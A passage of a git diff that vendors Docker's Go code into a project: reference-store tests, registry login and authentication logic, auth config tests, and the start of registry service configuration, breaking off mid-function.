+	marshalledSaveLoadTestCases = []byte(`{"Repositories":{"busybox":{"busybox:latest":"sha256:91e54dfb11794fad694460162bf0cb0a4fa710cfa3f60979c177d920813e267c"},"jess/hollywood":{"jess/hollywood:latest":"sha256:ae7a5519a0a55a2d4ef20ddcbd5d0ca0888a1f7ab806acc8e2a27baf46f529fe"},"registry":{"registry@sha256:367eb40fd0330a7e464777121e39d2f5b3e8e23a1e159342e53ab05c9e4d94e6":"sha256:24126a56805beb9711be5f4590cc2eb55ab8d4a85ebd618eed72bb19fc50631c"},"registry:5000/foobar":{"registry:5000/foobar:HEAD":"sha256:470022b8af682154f57a2163d030eb369549549cba00edc69e1b99b46bb924d6","registry:5000/foobar:alternate":"sha256:ae300ebc4a4f00693702cfb0a5e0b7bc527b353828dc86ad09fb95c8a681b793","registry:5000/foobar:latest":"sha256:6153498b9ac00968d71b66cca4eac37e990b5f9eb50c26877eb8799c8847451b","registry:5000/foobar:master":"sha256:6c9917af4c4e05001b346421959d7ea81b6dc9d25718466a37a6add865dfd7fc"}}}`)
+)
+
+func TestLoad(t *testing.T) {
+	jsonFile, err := ioutil.TempFile("", "tag-store-test")
+	if err != nil {
+		t.Fatalf("error creating temp file: %v", err)
+	}
+	defer os.RemoveAll(jsonFile.Name())
+
+	// Write canned json to the temp file
+	_, err = jsonFile.Write(marshalledSaveLoadTestCases)
+	if err != nil {
+		t.Fatalf("error writing to temp file: %v", err)
+	}
+	jsonFile.Close()
+
+	store, err := NewReferenceStore(jsonFile.Name())
+	if err != nil {
+		t.Fatalf("error creating tag store: %v", err)
+	}
+
+	for refStr, expectedID := range saveLoadTestCases {
+		ref, err := ParseNamed(refStr)
+		if err != nil {
+			t.Fatalf("failed to parse reference: %v", err)
+		}
+		id, err := store.Get(ref)
+		if err != nil {
+			t.Fatalf("could not find reference %s: %v", refStr, err)
+		}
+		if id != expectedID {
+			t.Fatalf("expected %s - got %s", expectedID, id)
+		}
+	}
+}
+
+func TestSave(t *testing.T) {
+	jsonFile, err := ioutil.TempFile("", "tag-store-test")
+	if err != nil {
+		t.Fatalf("error creating temp file: %v", err)
+	}
+	_, err = jsonFile.Write([]byte(`{}`))
+	jsonFile.Close()
+	defer os.RemoveAll(jsonFile.Name())
+
+	store, err := NewReferenceStore(jsonFile.Name())
+	if err != nil {
+		t.Fatalf("error creating tag store: %v", err)
+	}
+
+	for refStr, id := range saveLoadTestCases {
+		ref, err := ParseNamed(refStr)
+		if err != nil {
+			t.Fatalf("failed to parse reference: %v", err)
+		}
+		if canonical, ok := ref.(Canonical); ok {
+			err = store.AddDigest(canonical, id, false)
+			if err != nil {
+				t.Fatalf("could not add digest reference %s: %v", refStr, err)
+			}
+		} else {
+			err = store.AddTag(ref, id, false)
+			if err != nil {
+				t.Fatalf("could not add reference %s: %v", refStr, err)
+			}
+		}
+	}
+
+	jsonBytes, err := ioutil.ReadFile(jsonFile.Name())
+	if err != nil {
+		t.Fatalf("could not read json file: %v", err)
+	}
+
+	if !bytes.Equal(jsonBytes, marshalledSaveLoadTestCases) {
+		t.Fatalf("save output did not match expectations\nexpected:\n%s\ngot:\n%s", marshalledSaveLoadTestCases, jsonBytes)
+	}
+}
+
+func TestAddDeleteGet(t *testing.T) {
+	jsonFile, err := ioutil.TempFile("", "tag-store-test")
+	if err != nil {
+		t.Fatalf("error creating temp file: %v", err)
+	}
+	_, err = jsonFile.Write([]byte(`{}`))
+	jsonFile.Close()
+	defer os.RemoveAll(jsonFile.Name())
+
+	store, err := NewReferenceStore(jsonFile.Name())
+	if err != nil {
+		t.Fatalf("error creating tag store: %v", err)
+	}
+
+	testImageID1 := digest.Digest("sha256:9655aef5fd742a1b4e1b7b163aa9f1c76c186304bf39102283d80927c916ca9c")
+	testImageID2 := digest.Digest("sha256:9655aef5fd742a1b4e1b7b163aa9f1c76c186304bf39102283d80927c916ca9d")
+	testImageID3 := digest.Digest("sha256:9655aef5fd742a1b4e1b7b163aa9f1c76c186304bf39102283d80927c916ca9e")
+
+	// Try adding a reference with no tag or digest
+	nameOnly, err := WithName("username/repo")
+	if err != nil {
+		t.Fatalf("could not parse reference: %v", err)
+	}
+	if err = store.AddTag(nameOnly, testImageID1, false); err != nil {
+		t.Fatalf("error adding to store: %v", err)
+	}
+
+	// Add a few references
+	ref1, err := ParseNamed("username/repo1:latest")
+	if err != nil {
+		t.Fatalf("could not parse reference: %v", err)
+	}
+	if err = store.AddTag(ref1, testImageID1, false); err != nil {
+		t.Fatalf("error adding to store: %v", err)
+	}
+
+	ref2, err := ParseNamed("username/repo1:old")
+	if err != nil {
+		t.Fatalf("could not parse reference: %v", err)
+	}
+	if err = store.AddTag(ref2, testImageID2, false); err != nil {
+		t.Fatalf("error adding to store: %v", err)
+	}
+
+	ref3, err := ParseNamed("username/repo1:alias")
+	if err != nil {
+		t.Fatalf("could not parse reference: %v", err)
+	}
+	if err = store.AddTag(ref3, testImageID1, false); err != nil {
+		t.Fatalf("error adding to store: %v", err)
+	}
+
+	ref4, err := ParseNamed("username/repo2:latest")
+	if err != nil {
+		t.Fatalf("could not parse reference: %v", err)
+	}
+	if err = store.AddTag(ref4, testImageID2, false); err != nil {
+		t.Fatalf("error adding to store: %v", err)
+	}
+
+	ref5, err := ParseNamed("username/repo3@sha256:58153dfb11794fad694460162bf0cb0a4fa710cfa3f60979c177d920813e267c")
+	if err != nil {
+		t.Fatalf("could not parse reference: %v", err)
+	}
+	if err = store.AddDigest(ref5.(Canonical), testImageID2, false); err != nil {
+		t.Fatalf("error adding to store: %v", err)
+	}
+
+	// Attempt to overwrite with force == false
+	if err = store.AddTag(ref4, testImageID3, false); err == nil || !strings.HasPrefix(err.Error(), "Conflict:") {
+		t.Fatalf("did not get expected error on overwrite attempt - got %v", err)
+	}
+	// Repeat to overwrite with force == true
+	if err = store.AddTag(ref4, testImageID3, true); err != nil {
+		t.Fatalf("failed to force tag overwrite: %v", err)
+	}
+
+	// Check references so far
+	id, err := store.Get(nameOnly)
+	if err != nil {
+		t.Fatalf("Get returned error: %v", err)
+	}
+	if id != testImageID1 {
+		t.Fatalf("id mismatch: got %s instead of %s", id.String(), testImageID1.String())
+	}
+
+	id, err = store.Get(ref1)
+	if err != nil {
+		t.Fatalf("Get returned error: %v", err)
+	}
+	if id != testImageID1 {
+		t.Fatalf("id mismatch: got %s instead of %s", id.String(), testImageID1.String())
+	}
+
+	id, err = store.Get(ref2)
+	if err != nil {
+		t.Fatalf("Get returned error: %v", err)
+	}
+	if id != testImageID2 {
+		t.Fatalf("id mismatch: got %s instead of %s", id.String(), testImageID2.String())
+	}
+
+	id, err = store.Get(ref3)
+	if err != nil {
+		t.Fatalf("Get returned error: %v", err)
+	}
+	if id != testImageID1 {
+		t.Fatalf("id mismatch: got %s instead of %s", id.String(), testImageID1.String())
+	}
+
+	id, err = store.Get(ref4)
+	if err != nil {
+		t.Fatalf("Get returned error: %v", err)
+	}
+	if id != testImageID3 {
+		t.Fatalf("id mismatch: got %s instead of %s", id.String(), testImageID3.String())
+	}
+
+	id, err = store.Get(ref5)
+	if err != nil {
+		t.Fatalf("Get returned error: %v", err)
+	}
+	if id != testImageID2 {
+		t.Fatalf("id mismatch: got %s instead of %s", id.String(), testImageID3.String())
+	}
+
+	// Get should return ErrDoesNotExist for a nonexistent repo
+	nonExistRepo, err := ParseNamed("username/nonexistrepo:latest")
+	if err != nil {
+		t.Fatalf("could not parse reference: %v", err)
+	}
+	if _, err = store.Get(nonExistRepo); err != ErrDoesNotExist {
+		t.Fatal("Expected ErrDoesNotExist from Get")
+	}
+
+	// Get should return ErrDoesNotExist for a nonexistent tag
+	nonExistTag, err := ParseNamed("username/repo1:nonexist")
+	if err != nil {
+		t.Fatalf("could not parse reference: %v", err)
+	}
+	if _, err = store.Get(nonExistTag); err != ErrDoesNotExist {
+		t.Fatal("Expected ErrDoesNotExist from Get")
+	}
+
+	// Check References
+	refs := store.References(testImageID1)
+	if len(refs) != 3 {
+		t.Fatal("unexpected number of references")
+	}
+	// Looking for the references in this order verifies that they are
+	// returned lexically sorted.
+	if refs[0].String() != ref3.String() {
+		t.Fatalf("unexpected reference: %v", refs[0].String())
+	}
+	if refs[1].String() != ref1.String() {
+		t.Fatalf("unexpected reference: %v", refs[1].String())
+	}
+	if refs[2].String() != nameOnly.String()+":latest" {
+		t.Fatalf("unexpected reference: %v", refs[2].String())
+	}
+
+	// Check ReferencesByName
+	repoName, err := WithName("username/repo1")
+	if err != nil {
+		t.Fatalf("could not parse reference: %v", err)
+	}
+	associations := store.ReferencesByName(repoName)
+	if len(associations) != 3 {
+		t.Fatal("unexpected number of associations")
+	}
+	// Looking for the associations in this order verifies that they are
+	// returned lexically sorted.
+	if associations[0].Ref.String() != ref3.String() {
+		t.Fatalf("unexpected reference: %v", associations[0].Ref.String())
+	}
+	if associations[0].ID != testImageID1 {
+		t.Fatalf("unexpected reference: %v", associations[0].Ref.String())
+	}
+	if associations[1].Ref.String() != ref1.String() {
+		t.Fatalf("unexpected reference: %v", associations[1].Ref.String())
+	}
+	if associations[1].ID != testImageID1 {
+		t.Fatalf("unexpected reference: %v", associations[1].Ref.String())
+	}
+	if associations[2].Ref.String() != ref2.String() {
+		t.Fatalf("unexpected reference: %v", associations[2].Ref.String())
+	}
+	if associations[2].ID != testImageID2 {
+		t.Fatalf("unexpected reference: %v", associations[2].Ref.String())
+	}
+
+	// Delete should return ErrDoesNotExist for a nonexistent repo
+	if _, err = store.Delete(nonExistRepo); err != ErrDoesNotExist {
+		t.Fatal("Expected ErrDoesNotExist from Delete")
+	}
+
+	// Delete should return ErrDoesNotExist for a nonexistent tag
+	if _, err = store.Delete(nonExistTag); err != ErrDoesNotExist {
+		t.Fatal("Expected ErrDoesNotExist from Delete")
+	}
+
+	// Delete a few references
+	if deleted, err := store.Delete(ref1); err != nil || deleted != true {
+		t.Fatal("Delete failed")
+	}
+	if _, err := store.Get(ref1); err != ErrDoesNotExist {
+		t.Fatal("Expected ErrDoesNotExist from Get")
+	}
+	if deleted, err := store.Delete(ref5); err != nil || deleted != true {
+		t.Fatal("Delete failed")
+	}
+	if _, err := store.Get(ref5); err != ErrDoesNotExist {
+		t.Fatal("Expected ErrDoesNotExist from Get")
+	}
+	if deleted, err := store.Delete(nameOnly); err != nil || deleted != true {
+		t.Fatal("Delete failed")
+	}
+	if _, err := store.Get(nameOnly); err != ErrDoesNotExist {
+		t.Fatal("Expected ErrDoesNotExist from Get")
+	}
+}
+
+func TestInvalidTags(t *testing.T) {
+	tmpDir, err := ioutil.TempDir("", "tag-store-test")
+	defer os.RemoveAll(tmpDir)
+
+	store, err := NewReferenceStore(filepath.Join(tmpDir, "repositories.json"))
+	if err != nil {
+		t.Fatalf("error creating tag store: %v", err)
+	}
+	id := digest.Digest("sha256:470022b8af682154f57a2163d030eb369549549cba00edc69e1b99b46bb924d6")
+
+	// sha256 as repo name
+	ref, err := ParseNamed("sha256:abc")
+	if err != nil {
+		t.Fatal(err)
+	}
+	err = store.AddTag(ref, id, true)
+	if err == nil {
+		t.Fatalf("expected setting tag %q to fail", ref)
+	}
+
+	// setting digest as a tag
+	ref, err = ParseNamed("registry@sha256:367eb40fd0330a7e464777121e39d2f5b3e8e23a1e159342e53ab05c9e4d94e6")
+	if err != nil {
+		t.Fatal(err)
+	}
+	err = store.AddTag(ref, id, true)
+	if err == nil {
+		t.Fatalf("expected setting digest %q to fail", ref)
+	}
+
+}
diff --git a/vendor/github.com/docker/docker/registry/auth.go b/vendor/github.com/docker/docker/registry/auth.go
new file mode 100644
index 0000000000..8cadd51ba0
--- /dev/null
+++ b/vendor/github.com/docker/docker/registry/auth.go
@@ -0,0 +1,303 @@
+package registry
+
+import (
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"net/url"
+	"strings"
+	"time"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/distribution/registry/client/auth"
+	"github.com/docker/distribution/registry/client/auth/challenge"
+	"github.com/docker/distribution/registry/client/transport"
+	"github.com/docker/docker/api/types"
+	registrytypes "github.com/docker/docker/api/types/registry"
+)
+
+const (
+	// AuthClientID is used the ClientID used for the token server
+	AuthClientID = "docker"
+)
+
+// loginV1 tries to register/login to the v1 registry server.
+func loginV1(authConfig *types.AuthConfig, apiEndpoint APIEndpoint, userAgent string) (string, string, error) {
+	registryEndpoint, err := apiEndpoint.ToV1Endpoint(userAgent, nil)
+	if err != nil {
+		return "", "", err
+	}
+
+	serverAddress := registryEndpoint.String()
+
+	logrus.Debugf("attempting v1 login to registry endpoint %s", serverAddress)
+
+	if serverAddress == "" {
+		return "", "", fmt.Errorf("Server Error: Server Address not set.")
+	}
+
+	loginAgainstOfficialIndex := serverAddress == IndexServer
+
+	req, err := http.NewRequest("GET", serverAddress+"users/", nil)
+	if err != nil {
+		return "", "", err
+	}
+	req.SetBasicAuth(authConfig.Username, authConfig.Password)
+	resp, err := registryEndpoint.client.Do(req)
+	if err != nil {
+		// fallback when request could not be completed
+		return "", "", fallbackError{
+			err: err,
+		}
+	}
+	defer resp.Body.Close()
+	body, err := ioutil.ReadAll(resp.Body)
+	if err != nil {
+		return "", "", err
+	}
+	if resp.StatusCode == http.StatusOK {
+		return "Login Succeeded", "", nil
+	} else if resp.StatusCode == http.StatusUnauthorized {
+		if loginAgainstOfficialIndex {
+			return "", "", fmt.Errorf("Wrong login/password, please try again. Haven't got a Docker ID? Create one at https://hub.docker.com")
+		}
+		return "", "", fmt.Errorf("Wrong login/password, please try again")
+	} else if resp.StatusCode == http.StatusForbidden {
+		if loginAgainstOfficialIndex {
+			return "", "", fmt.Errorf("Login: Account is not active. Please check your e-mail for a confirmation link.")
+		}
+		// *TODO: Use registry configuration to determine what this says, if anything?
+		return "", "", fmt.Errorf("Login: Account is not active. Please see the documentation of the registry %s for instructions how to activate it.", serverAddress)
+	} else if resp.StatusCode == http.StatusInternalServerError { // Issue #14326
+		logrus.Errorf("%s returned status code %d. Response Body :\n%s", req.URL.String(), resp.StatusCode, body)
+		return "", "", fmt.Errorf("Internal Server Error")
+	}
+	return "", "", fmt.Errorf("Login: %s (Code: %d; Headers: %s)", body,
+		resp.StatusCode, resp.Header)
+}
+
+type loginCredentialStore struct {
+	authConfig *types.AuthConfig
+}
+
+func (lcs loginCredentialStore) Basic(*url.URL) (string, string) {
+	return lcs.authConfig.Username, lcs.authConfig.Password
+}
+
+func (lcs loginCredentialStore) RefreshToken(*url.URL, string) string {
+	return lcs.authConfig.IdentityToken
+}
+
+func (lcs loginCredentialStore) SetRefreshToken(u *url.URL, service, token string) {
+	lcs.authConfig.IdentityToken = token
+}
+
+type staticCredentialStore struct {
+	auth *types.AuthConfig
+}
+
+// NewStaticCredentialStore returns a credential store
+// which always returns the same credential values.
+func NewStaticCredentialStore(auth *types.AuthConfig) auth.CredentialStore {
+	return staticCredentialStore{
+		auth: auth,
+	}
+}
+
+func (scs staticCredentialStore) Basic(*url.URL) (string, string) {
+	if scs.auth == nil {
+		return "", ""
+	}
+	return scs.auth.Username, scs.auth.Password
+}
+
+func (scs staticCredentialStore) RefreshToken(*url.URL, string) string {
+	if scs.auth == nil {
+		return ""
+	}
+	return scs.auth.IdentityToken
+}
+
+func (scs staticCredentialStore) SetRefreshToken(*url.URL, string, string) {
+}
+
+type fallbackError struct {
+	err error
+}
+
+func (err fallbackError) Error() string {
+	return err.err.Error()
+}
+
+// loginV2 tries to login to the v2 registry server. The given registry
+// endpoint will be pinged to get authorization challenges. These challenges
+// will be used to authenticate against the registry to validate credentials.
+func loginV2(authConfig *types.AuthConfig, endpoint APIEndpoint, userAgent string) (string, string, error) {
+	logrus.Debugf("attempting v2 login to registry endpoint %s", strings.TrimRight(endpoint.URL.String(), "/")+"/v2/")
+
+	modifiers := DockerHeaders(userAgent, nil)
+	authTransport := transport.NewTransport(NewTransport(endpoint.TLSConfig), modifiers...)
+
+	credentialAuthConfig := *authConfig
+	creds := loginCredentialStore{
+		authConfig: &credentialAuthConfig,
+	}
+
+	loginClient, foundV2, err := v2AuthHTTPClient(endpoint.URL, authTransport, modifiers, creds, nil)
+	if err != nil {
+		return "", "", err
+	}
+
+	endpointStr := strings.TrimRight(endpoint.URL.String(), "/") + "/v2/"
+	req, err := http.NewRequest("GET", endpointStr, nil)
+	if err != nil {
+		if !foundV2 {
+			err = fallbackError{err: err}
+		}
+		return "", "", err
+	}
+
+	resp, err := loginClient.Do(req)
+	if err != nil {
+		if !foundV2 {
+			err = fallbackError{err: err}
+		}
+		return "", "", err
+	}
+	defer resp.Body.Close()
+
+	if resp.StatusCode != http.StatusOK {
+		// TODO(dmcgowan): Attempt to further interpret result, status code and error code string
+		err := fmt.Errorf("login attempt to %s failed with status: %d %s", endpointStr, resp.StatusCode, http.StatusText(resp.StatusCode))
+		if !foundV2 {
+			err = fallbackError{err: err}
+		}
+		return "", "", err
+	}
+
+	return "Login Succeeded", credentialAuthConfig.IdentityToken, nil
+
+}
+
+func v2AuthHTTPClient(endpoint *url.URL, authTransport http.RoundTripper, modifiers []transport.RequestModifier, creds auth.CredentialStore, scopes []auth.Scope) (*http.Client, bool, error) {
+	challengeManager, foundV2, err := PingV2Registry(endpoint, authTransport)
+	if err != nil {
+		if !foundV2 {
+			err = fallbackError{err: err}
+		}
+		return nil, foundV2, err
+	}
+
+	tokenHandlerOptions := auth.TokenHandlerOptions{
+		Transport:     authTransport,
+		Credentials:   creds,
+		OfflineAccess: true,
+		ClientID:      AuthClientID,
+		Scopes:        scopes,
+	}
+	tokenHandler := auth.NewTokenHandlerWithOptions(tokenHandlerOptions)
+	basicHandler := auth.NewBasicHandler(creds)
+	modifiers = append(modifiers, auth.NewAuthorizer(challengeManager, tokenHandler, basicHandler))
+	tr := transport.NewTransport(authTransport, modifiers...)
+
+	return &http.Client{
+		Transport: tr,
+		Timeout:   15 * time.Second,
+	}, foundV2, nil
+
+}
+
+// ConvertToHostname converts a registry url which has http|https prepended
+// to just an hostname.
+func ConvertToHostname(url string) string {
+	stripped := url
+	if strings.HasPrefix(url, "http://") {
+		stripped = strings.TrimPrefix(url, "http://")
+	} else if strings.HasPrefix(url, "https://") {
+		stripped = strings.TrimPrefix(url, "https://")
+	}
+
+	nameParts := strings.SplitN(stripped, "/", 2)
+
+	return nameParts[0]
+}
+
+// ResolveAuthConfig matches an auth configuration to a server address or a URL
+func ResolveAuthConfig(authConfigs map[string]types.AuthConfig, index *registrytypes.IndexInfo) types.AuthConfig {
+	configKey := GetAuthConfigKey(index)
+	// First try the happy case
+	if c, found := authConfigs[configKey]; found || index.Official {
+		return c
+	}
+
+	// Maybe they have a legacy config file, we will iterate the keys converting
+	// them to the new format and testing
+	for registry, ac := range authConfigs {
+		if configKey == ConvertToHostname(registry) {
+			return ac
+		}
+	}
+
+	// When all else fails, return an empty auth config
+	return types.AuthConfig{}
+}
+
+// PingResponseError is used when the response from a ping
+// was received but invalid.
+type PingResponseError struct {
+	Err error
+}
+
+func (err PingResponseError) Error() string {
+	return err.Err.Error()
+}
+
+// PingV2Registry attempts to ping a v2 registry and on success return a
+// challenge manager for the supported authentication types and
+// whether v2 was confirmed by the response. If a response is received but
+// cannot be interpreted a PingResponseError will be returned.
+func PingV2Registry(endpoint *url.URL, transport http.RoundTripper) (challenge.Manager, bool, error) {
+	var (
+		foundV2   = false
+		v2Version = auth.APIVersion{
+			Type:    "registry",
+			Version: "2.0",
+		}
+	)
+
+	pingClient := &http.Client{
+		Transport: transport,
+		Timeout:   15 * time.Second,
+	}
+	endpointStr := strings.TrimRight(endpoint.String(), "/") + "/v2/"
+	req, err := http.NewRequest("GET", endpointStr, nil)
+	if err != nil {
+		return nil, false, err
+	}
+	resp, err := pingClient.Do(req)
+	if err != nil {
+		return nil, false, err
+	}
+	defer resp.Body.Close()
+
+	versions := auth.APIVersions(resp, DefaultRegistryVersionHeader)
+	for _, pingVersion := range versions {
+		if pingVersion == v2Version {
+			// The version header indicates we're definitely
+			// talking to a v2 registry. So don't allow future
+			// fallbacks to the v1 protocol.
+
+			foundV2 = true
+			break
+		}
+	}
+
+	challengeManager := challenge.NewSimpleManager()
+	if err := challengeManager.AddResponse(resp); err != nil {
+		return nil, foundV2, PingResponseError{
+			Err: err,
+		}
+	}
+
+	return challengeManager, foundV2, nil
+}
diff --git a/vendor/github.com/docker/docker/registry/auth_test.go b/vendor/github.com/docker/docker/registry/auth_test.go
new file mode 100644
index 0000000000..9ab71aa4fb
--- /dev/null
+++ b/vendor/github.com/docker/docker/registry/auth_test.go
@@ -0,0 +1,124 @@
+// +build !solaris
+
+// TODO: Support Solaris
+
+package registry
+
+import (
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	registrytypes "github.com/docker/docker/api/types/registry"
+)
+
+func buildAuthConfigs() map[string]types.AuthConfig {
+	authConfigs := map[string]types.AuthConfig{}
+
+	for _, registry := range []string{"testIndex", IndexServer} {
+		authConfigs[registry] = types.AuthConfig{
+			Username: "docker-user",
+			Password: "docker-pass",
+		}
+	}
+
+	return authConfigs
+}
+
+func TestSameAuthDataPostSave(t *testing.T) {
+	authConfigs := buildAuthConfigs()
+	authConfig := authConfigs["testIndex"]
+	if authConfig.Username != "docker-user" {
+		t.Fail()
+	}
+	if authConfig.Password != "docker-pass" {
+		t.Fail()
+	}
+	if authConfig.Auth != "" {
+		t.Fail()
+	}
+}
+
+func TestResolveAuthConfigIndexServer(t *testing.T) {
+	authConfigs := buildAuthConfigs()
+	indexConfig := authConfigs[IndexServer]
+
+	officialIndex := &registrytypes.IndexInfo{
+		Official: true,
+	}
+	privateIndex := &registrytypes.IndexInfo{
+		Official: false,
+	}
+
+	resolved := ResolveAuthConfig(authConfigs, officialIndex)
+	assertEqual(t, resolved, indexConfig, "Expected ResolveAuthConfig to return IndexServer")
+
+	resolved = ResolveAuthConfig(authConfigs, privateIndex)
+	assertNotEqual(t, resolved, indexConfig, "Expected ResolveAuthConfig to not return IndexServer")
+}
+
+func TestResolveAuthConfigFullURL(t *testing.T) {
+	authConfigs := buildAuthConfigs()
+
+	registryAuth := types.AuthConfig{
+		Username: "foo-user",
+		Password: "foo-pass",
+	}
+	localAuth := types.AuthConfig{
+		Username: "bar-user",
+		Password: "bar-pass",
+	}
+	officialAuth := types.AuthConfig{
+		Username: "baz-user",
+		Password: "baz-pass",
+	}
+	authConfigs[IndexServer] = officialAuth
+
+	expectedAuths := map[string]types.AuthConfig{
+		"registry.example.com": registryAuth,
+		"localhost:8000":       localAuth,
+		"registry.com":         localAuth,
+	}
+
+	validRegistries := map[string][]string{
+		"registry.example.com": {
+			"https://registry.example.com/v1/",
+			"http://registry.example.com/v1/",
+			"registry.example.com",
+			"registry.example.com/v1/",
+		},
+		"localhost:8000": {
+			"https://localhost:8000/v1/",
+			"http://localhost:8000/v1/",
+			"localhost:8000",
+			"localhost:8000/v1/",
+		},
+		"registry.com": {
+			"https://registry.com/v1/",
+			"http://registry.com/v1/",
+			"registry.com",
+			"registry.com/v1/",
+		},
+	}
+
+	for configKey, registries := range validRegistries {
+		configured, ok := expectedAuths[configKey]
+		if !ok {
+			t.Fail()
+		}
+		index := &registrytypes.IndexInfo{
+			Name: configKey,
+		}
+		for _, registry := range registries {
+			authConfigs[registry] = configured
+			resolved := ResolveAuthConfig(authConfigs, index)
+			if resolved.Username != configured.Username || resolved.Password != configured.Password {
+				t.Errorf("%s -> %v != %v\n", registry, resolved, configured)
+			}
+			delete(authConfigs, registry)
+			resolved = ResolveAuthConfig(authConfigs, index)
+			if resolved.Username == configured.Username || resolved.Password == configured.Password {
+				t.Errorf("%s -> %v == %v\n", registry, resolved, configured)
+			}
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/registry/config.go b/vendor/github.com/docker/docker/registry/config.go
new file mode 100644
index 0000000000..9a4f6a9251
--- /dev/null
+++ b/vendor/github.com/docker/docker/registry/config.go
@@ -0,0 +1,305 @@
+package registry
+
+import (
+	"errors"
+	"fmt"
+	"net"
+	"net/url"
+	"strings"
+
+	registrytypes "github.com/docker/docker/api/types/registry"
+	"github.com/docker/docker/opts"
+	"github.com/docker/docker/reference"
+	"github.com/spf13/pflag"
+)
+
+// ServiceOptions holds command line options.
+type ServiceOptions struct {
+	Mirrors            []string `json:"registry-mirrors,omitempty"`
+	InsecureRegistries []string `json:"insecure-registries,omitempty"`
+
+	// V2Only controls access to legacy registries.  If it is set to true via the
+	// command line flag the daemon will not attempt to contact v1 legacy registries
+	V2Only bool `json:"disable-legacy-registry,omitempty"`
+}
+
+// serviceConfig holds daemon configuration for the registry service.
+type serviceConfig struct {
+	registrytypes.ServiceConfig
+	V2Only bool
+}
+
+var (
+	// DefaultNamespace is the default namespace
+	DefaultNamespace = "docker.io"
+	// DefaultRegistryVersionHeader is the name of the default HTTP header
+	// that carries Registry version info
+	DefaultRegistryVersionHeader = "Docker-Distribution-Api-Version"
+
+	// IndexHostname is the index hostname
+	IndexHostname = "index.docker.io"
+	// IndexServer is used for user auth and image search
+	IndexServer = "https://" + IndexHostname + "/v1/"
+	// IndexName is the name of the index
+	IndexName = "docker.io"
+
+	// NotaryServer is the endpoint serving the Notary trust server
+	NotaryServer = "https://notary.docker.io"
+
+	// DefaultV2Registry is the URI of the default v2 registry
+	DefaultV2Registry = &url.URL{
+		Scheme: "https",
+		Host:   "registry-1.docker.io",
+	}
+)
+
+var (
+	// ErrInvalidRepositoryName is an error returned if the repository name did
+	// not have the correct form
+	ErrInvalidRepositoryName = errors.New("Invalid repository name (ex: \"registry.domain.tld/myrepos\")")
+
+	emptyServiceConfig = newServiceConfig(ServiceOptions{})
+)
+
+// for mocking in unit tests
+var lookupIP = net.LookupIP
+
+// InstallCliFlags adds command-line options to the top-level flag parser for
+// the current process.
+func (options *ServiceOptions) InstallCliFlags(flags *pflag.FlagSet) {
+	mirrors := opts.NewNamedListOptsRef("registry-mirrors", &options.Mirrors, ValidateMirror)
+	insecureRegistries := opts.NewNamedListOptsRef("insecure-registries", &options.InsecureRegistries, ValidateIndexName)
+
+	flags.Var(mirrors, "registry-mirror", "Preferred Docker registry mirror")
+	flags.Var(insecureRegistries, "insecure-registry", "Enable insecure registry communication")
+
+	options.installCliPlatformFlags(flags)
+}
+
+// newServiceConfig returns a new instance of ServiceConfig
+func newServiceConfig(options ServiceOptions) *serviceConfig {
+	config := &serviceConfig{
+		ServiceConfig: registrytypes.ServiceConfig{
+			InsecureRegistryCIDRs: make([]*registrytypes.NetIPNet, 0),
+			IndexConfigs:          make(map[string]*registrytypes.IndexInfo, 0),
+			// Hack: Bypass setting the mirrors to IndexConfigs since they are going away
+			// and Mirrors are only for the official registry anyways.
+			Mirrors: options.Mirrors,
+		},
+		V2Only: options.V2Only,
+	}
+
+	config.LoadInsecureRegistries(options.InsecureRegistries)
+
+	return config
+}
+
+// LoadInsecureRegistries loads insecure registries to config
+func (config *serviceConfig) LoadInsecureRegistries(registries []string) error {
+	// Localhost is by default considered as an insecure registry
+	// This is a stop-gap for people who are running a private registry on localhost (especially on Boot2docker).
+	//
+	// TODO: should we deprecate this once it is easier for people to set up a TLS registry or change
+	// daemon flags on boot2docker?
+	registries = append(registries, "127.0.0.0/8")
+
+	// Store original InsecureRegistryCIDRs and IndexConfigs
+	// Clean InsecureRegistryCIDRs and IndexConfigs in config, as passed registries has all insecure registry info.
+	originalCIDRs := config.ServiceConfig.InsecureRegistryCIDRs
+	originalIndexInfos := config.ServiceConfig.IndexConfigs
+
+	config.ServiceConfig.InsecureRegistryCIDRs = make([]*registrytypes.NetIPNet, 0)
+	config.ServiceConfig.IndexConfigs = make(map[string]*registrytypes.IndexInfo, 0)
+
+skip:
+	for _, r := range registries {
+		// validate insecure registry
+		if _, err := ValidateIndexName(r); err != nil {
+			// before returning err, roll back to original data
+			config.ServiceConfig.InsecureRegistryCIDRs = originalCIDRs
+			config.ServiceConfig.IndexConfigs = originalIndexInfos
+			return err
+		}
+		// Check if CIDR was passed to --insecure-registry
+		_, ipnet, err := net.ParseCIDR(r)
+		if err == nil {
+			// Valid CIDR. If ipnet is already in config.InsecureRegistryCIDRs, skip.
+			data := (*registrytypes.NetIPNet)(ipnet)
+			for _, value := range config.InsecureRegistryCIDRs {
+				if value.IP.String() == data.IP.String() && value.Mask.String() == data.Mask.String() {
+					continue skip
+				}
+			}
+			// ipnet is not found, add it in config.InsecureRegistryCIDRs
+			config.InsecureRegistryCIDRs = append(config.InsecureRegistryCIDRs, data)
+
+		} else {
+			// Assume `host:port` if not CIDR.
+			config.IndexConfigs[r] = &registrytypes.IndexInfo{
+				Name:     r,
+				Mirrors:  make([]string, 0),
+				Secure:   false,
+				Official: false,
+			}
+		}
+	}
+
+	// Configure public registry.
+	config.IndexConfigs[IndexName] = &registrytypes.IndexInfo{
+		Name:     IndexName,
+		Mirrors:  config.Mirrors,
+		Secure:   true,
+		Official: true,
+	}
+
+	return nil
+}
+
+// isSecureIndex returns false if the provided indexName is part of the list of insecure registries
+// Insecure registries accept HTTP and/or accept HTTPS with certificates from unknown CAs.
+//
+// The list of insecure registries can contain an element with CIDR notation to specify a whole subnet.
+// If the subnet contains one of the IPs of the registry specified by indexName, the latter is considered
+// insecure.
+//
+// indexName should be a URL.Host (`host:port` or `host`) where the `host` part can be either a domain name
+// or an IP address. If it is a domain name, then it will be resolved in order to check if the IP is contained
+// in a subnet. If the resolving is not successful, isSecureIndex will only try to match hostname to any element
+// of insecureRegistries.
+func isSecureIndex(config *serviceConfig, indexName string) bool {
+	// Check for configured index, first.  This is needed in case isSecureIndex
+	// is called from anything besides newIndexInfo, in order to honor per-index configurations.
+	if index, ok := config.IndexConfigs[indexName]; ok {
+		return index.Secure
+	}
+
+	host, _, err := net.SplitHostPort(indexName)
+	if err != nil {
